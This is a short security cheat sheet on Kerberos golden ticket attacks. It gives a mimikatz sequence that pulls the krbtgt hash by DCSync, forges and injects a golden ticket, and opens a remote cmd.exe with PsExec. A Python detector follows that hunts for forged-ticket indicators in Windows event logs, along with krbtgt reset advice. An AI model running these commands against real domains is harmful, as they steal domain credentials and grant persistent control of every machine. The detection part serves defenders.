Golden Ticket Attacks

What is it?

  • When the krbtgt account is compromised, the domain is owned

  • Access can be requested to any resource or system on the domain

  • Golden tickets == complete access to every machine

Golden Ticket Creation
# Start mimikatz and enable the debug privilege
privilege::debug

# Grab the krbtgt hash using DCSync (the output contains the NTLM hash and the domain SID)
lsadump::dcsync /user:DOMAIN\krbtgt

# Generate the Golden ticket from the domain SID and the krbtgt hash, and inject it into the current session (/ptt)
kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /id:500 /ptt

# Now you should be able to open sessions using the golden ticket
misc::cmd

# Now you should be able to access all resources using the golden ticket
# For example: start a remote cmd.exe using psexec
PsExec.exe \\REMOTE_IP cmd.exe
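A forged TGT never passes through the domain controller's AS exchange, so the indicators a defender hunts for are the side effects: TGS requests (event 4769) for a user who has no preceding TGT request (event 4768) within the TGT lifetime, tickets encrypted with RC4 (0x17) in a domain that issues AES tickets, and logons (event 4624) under a name that does not exist in the directory or whose SID does not match the name. The following detector is an added example, not part of the original page; the event records, the account snapshot and the `KNOWN_ACCOUNTS` / `find_indicators` names are constructed for illustration, while the field names follow the Windows Security log.

```python
"""Hunt for golden-ticket indicators in Windows Security events.

Added example (not from the original page). Field names follow the
Windows Security log (EventID, TargetUserName, TargetSid/TargetUserSid,
TicketEncryptionType, IpAddress); the records below are constructed,
not real telemetry, and would normally come from a SIEM export.
"""
from datetime import datetime, timedelta

# Constructed directory snapshot: account name -> object SID.
KNOWN_ACCOUNTS = {
    "alice": "S-1-5-21-1-2-3-1105",
    "administrator": "S-1-5-21-1-2-3-500",
}

# Default domain policy for a TGT's maximum lifetime.
TGT_MAX_LIFETIME = timedelta(hours=10)

# Constructed DC events: a normal AS-REQ/TGS-REQ pair for alice, then a
# TGS request and logon for a name that matches no real account.
SAMPLE_EVENTS = [
    {"time": "2024-01-10T08:00:00", "EventID": 4768, "TargetUserName": "alice",
     "TargetSid": "S-1-5-21-1-2-3-1105", "TicketEncryptionType": "0x12",
     "IpAddress": "10.0.0.5"},
    {"time": "2024-01-10T08:00:05", "EventID": 4769, "TargetUserName": "alice@CORP.LOCAL",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    {"time": "2024-01-10T09:15:00", "EventID": 4769, "TargetUserName": "ghostadmin@CORP.LOCAL",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.77"},
    {"time": "2024-01-10T09:15:01", "EventID": 4624, "TargetUserName": "ghostadmin",
     "TargetUserSid": "S-1-5-21-1-2-3-500", "IpAddress": "10.0.0.77"},
]


def strip_realm(name):
    """Normalise 'user@REALM' / 'USER' to a lowercase bare account name."""
    return name.split("@")[0].lower()


def find_indicators(events, known_accounts=KNOWN_ACCOUNTS, tgt_lifetime=TGT_MAX_LIFETIME):
    """Return (user, indicator, source_ip) tuples for suspicious events.

    Indicators:
      tgs_without_tgt   4769 with no 4768 for the user inside the TGT lifetime
      rc4_ticket        4769 with TicketEncryptionType 0x17 (RC4-HMAC)
      unknown_account   4624 for a name absent from the directory snapshot
      sid_name_mismatch 4624 whose SID does not belong to that name
    """
    findings = []
    last_as_req = {}  # user -> time of the most recent 4768 seen
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        user = strip_realm(ev.get("TargetUserName", ""))
        ip = ev.get("IpAddress", "")
        eid = ev["EventID"]
        if eid == 4768:
            last_as_req[user] = t
        elif eid == 4769:
            seen = last_as_req.get(user)
            if seen is None or t - seen > tgt_lifetime:
                findings.append((user, "tgs_without_tgt", ip))
            if ev.get("TicketEncryptionType") == "0x17":
                findings.append((user, "rc4_ticket", ip))
        elif eid == 4624:
            sid = ev.get("TargetUserSid", "")
            if user not in known_accounts:
                findings.append((user, "unknown_account", ip))
            elif known_accounts[user] != sid:
                findings.append((user, "sid_name_mismatch", ip))
    return findings


if __name__ == "__main__":
    for user, indicator, ip in find_indicators(SAMPLE_EVENTS):
        print(f"{indicator:20} user={user} src={ip}")
```

The `tgs_without_tgt` rule needs events from every DC in the domain and a log window longer than the TGT lifetime, otherwise a legitimate TGT issued before the window or by another DC is flagged; treat its hits as hunting leads to correlate with the other indicators rather than standalone alerts. The RC4 check is only meaningful where AES is the expected ticket encryption type. Once a krbtgt compromise is confirmed, the remediation is resetting the krbtgt password twice, since tickets signed with the previous key remain valid until the second reset.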

Reference: Attacking Kerberos
